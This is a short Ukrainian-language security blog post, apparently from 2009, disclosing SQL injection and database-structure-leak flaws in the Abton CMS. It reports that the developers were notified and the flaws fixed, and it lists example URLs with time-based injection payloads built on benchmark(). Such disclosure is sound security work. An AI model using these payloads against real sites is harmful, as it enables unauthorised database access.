Уразливості в Abton

19:32 24.11.2009

16.02.2009

У березні, 31.03.2008, я знайшов SQL DB Structure Extraction та SQL Injection уразливості в системі Abton (це українська CMS). Як раз коли виявив уразливості на uareferat.com, де використовується даний движок. Також про ще одну SQL Injection в даному движку мені нещодавно повідомив Alex (в коментарях).

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

24.11.2009

SQL DB Structure Extraction:

http://site/rus/details/13220/

http://site/rus/referaty/’/

http://site/rus/’/

http://site/rus/referaty/1/-1/

http://site/abton/

На сайті на даному движку є багато подібних уразливостей, що призводять до витоку структури БД.

SQL Injection:

http://site/rus/details/’+benchmark(10000,md5(now()))+’/

http://site/rus/referaty/1′+benchmark(10000,md5(now()))-’1/

http://site/rus/’+benchmark(10000,md5(now()))+’/

Дані уразливості вже виправлені розробниками. Але в системі є чимало нових уразливостей.


Leave a Reply

You must be logged in to post a comment.